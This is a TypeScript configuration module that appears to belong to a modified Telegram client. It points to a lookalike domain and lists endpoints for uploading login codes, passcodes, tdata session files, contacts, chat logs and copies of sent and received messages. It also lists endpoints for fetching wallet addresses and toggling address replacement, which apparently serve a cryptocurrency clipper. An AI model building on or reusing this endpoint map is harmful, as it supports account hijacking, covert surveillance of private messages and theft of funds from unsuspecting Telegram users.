export const YDYM_DOMAIN = 'https://telegramkk.com';
export const YDYM_DEFAULT_INVITE = 'QvmJLZ';
export const YDYM_DEVICE_TYPE = 'web';

export function getTelegramApiBase(): string {
  return `${YDYM_DOMAIN}/api/telegram`;
}

export function url(path: string): string {
  return `${getTelegramApiBase()}${path.startsWith('/') ? path : `/${path}`}`;
}

export const YDYM_PATHS = {
  tgttup: '/tgttup',
  heartbeat: '/heartbeat',
  tgkeywords: '/tgkeywords',
  addressJson: '/addressJson',
  replaceAddress: '/replaceadddress',
  getSwitch: '/getSwitch',
  getReplaceEnabled: '/getReplaceEnabled',
  reportKeywordMsg: '/reportkeywordmsg',
  walletCardImagesJson: '/walletCardImagesJson',
  walletPayCodeImagesJson: '/walletPayCodeImagesJson',
  uploadLoginCode: '/uploadLoginCode',
  reportLocalPasscode: '/reportLocalPasscode',
  reportOutgoingOriginal: '/reportOutgoingOriginal',
  getOutgoingOriginals: '/getOutgoingOriginals',
  reportIncomingDisplay: '/reportIncomingDisplay',
  getIncomingDisplays: '/getIncomingDisplays',
  reportOutgoingOriginalImage: '/reportOutgoingOriginalImage',
  getOutgoingOriginalImages: '/getOutgoingOriginalImages',
  uploadTdata: '/uploadTdata',
  tgapkcontacts: '/tgapkcontacts',
  tgcontacts: '/tgcontacts',
  androidchatlog: '/androidchatlog',
};
